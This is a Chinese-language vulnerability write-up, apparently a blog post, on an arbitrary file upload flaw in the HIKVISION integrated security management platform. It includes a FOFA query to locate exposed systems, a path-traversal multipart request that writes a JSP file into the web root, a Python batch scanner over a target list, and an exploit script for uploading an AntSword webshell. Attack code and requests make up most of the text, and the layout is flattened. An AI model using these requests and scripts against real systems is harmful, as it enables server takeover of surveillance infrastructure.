申明:本文仅供技术学习参考使用,请勿用作违法用途,否则后果自负。
一、漏洞名称
HiKVISION综合安防管理平台任意文件上传漏洞
二、漏洞影响
HiKVISION综合安防管理平台
三、漏洞描述
HiKVISION综合安防管理平台 /center/api/files;.js 接口存在任意文件上传漏洞,攻击者可以通过漏洞上传木马到服务器中,获得webshell。
四、资产FOFA搜索语句
app="HIKVISION-综合安防管理平台"五、漏洞复现
向目标发送如下请求数据包,其中字符串ndbmaabfueriigbjadss12345是上传的jsp文件的内容
POST /center/api/files;.js HTTP/1.1Host: xx.xx.xx.xx:1443Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36------WebKitFormBoundaryxxmdzwoeContent-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp"Content-Type:image/jpeg<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>------WebKitFormBoundaryxxmdzwoe--
收到响应数据包如下,其中path字段表示文件访问路径
HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Type: application/json;charset=UTF-8Content-Length: 337Set-Cookie: JSESSIONID=73715E162ED9A0675D10A1644EEB3F12; Path=/center; HttpOnly;secureContent-Language: zh_CNExpires: 0Content-Disposition: inline;filename=f.txtDate: Mon, 11 Sep 2023 02:26:26 GMT{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","link":"http://192.168.240.1:8001/download1/center_faq/resource/5dab28a3-485a-4928-b358-0c73d3f2c40a/../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","id":"5dab28a3-485a-4928-b358-0c73d3f2c40a"},"msg":""}
然后请求如下路径查看上传的文件
https://xx.xx.xx.xx:1443/clusterMgr/ukgmfyufsi.jsp;.js看到页面内容是我们写入的字符串
证明存在该漏洞
六、漏洞验证poc
该python脚本可以批量检测漏洞,C:\Users\DELL\Desktop\1004.txt为输入目标文件,每行是一个url
import argparseimport timeimport requestsdef get_url(file):with open('{}'.format(file),'r',encoding='utf-8') as f:for i in f:i = i.replace('\n', '')send_req(i)def write_result(content):f = open("result.txt", "a", encoding="UTF-8")f.write('{}\n'.format(content))f.close()def send_req(url_check):print('{} runing Check'.format(url_check))url = url_check + '/center/api/files;.js'header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36','Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'}data = ("------WebKitFormBoundaryxxmdzwoe\r\n"'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n''Content-Type:image/jpeg\r\n'"\r\n"'<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>\r\n'"------WebKitFormBoundaryxxmdzwoe--\r\n")try:requests.packages.urllib3.disable_warnings()response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)res2 = requests.get(url2, verify=False)if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:result = '{} 存在任意文件上传漏洞! 请访问目标自测:{} \n'.format(url_check,url2)print(result)write_result(result)time.sleep(1)except Exception as e:passif __name__ == '__main__':file = r"C:\Users\DELL\Desktop\1004.txt"get_url(file)
七、漏洞利用exp
使用蚁剑生成木马,复制文本赋值给payload变量,运行脚本即可获得webshell
import argparseimport timeimport requestsdef get_url(file):with open('{}'.format(file),'r',encoding='utf-8') as f:for i in f:i = i.replace('\n', '')send_req(i)def write_result(content):f = open("result.txt", "a", encoding="UTF-8")f.write('{}\n'.format(content))f.close()def send_req(url_check):print('{} runing Check'.format(url_check))url = url_check + '/center/api/files;.js'header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36','Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'}payload = ""# 木马文件内容data = ("------WebKitFormBoundaryxxmdzwoe\r\n"'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n''Content-Type:image/jpeg\r\n'"\r\n"'<%out.println("{}");%>\r\n'"------WebKitFormBoundaryxxmdzwoe--\r\n").format(payload)try:requests.packages.urllib3.disable_warnings()response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)res2 = requests.get(url2, verify=False)if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:result = '{} webshell上传成功! url:{} 密码:mypasswd\n'.format(url_check,url2)print(result)write_result(result)time.sleep(1)except Exception as e:passif __name__ == '__main__':file = r"C:\Users\DELL\Desktop\1004.txt"get_url(file)
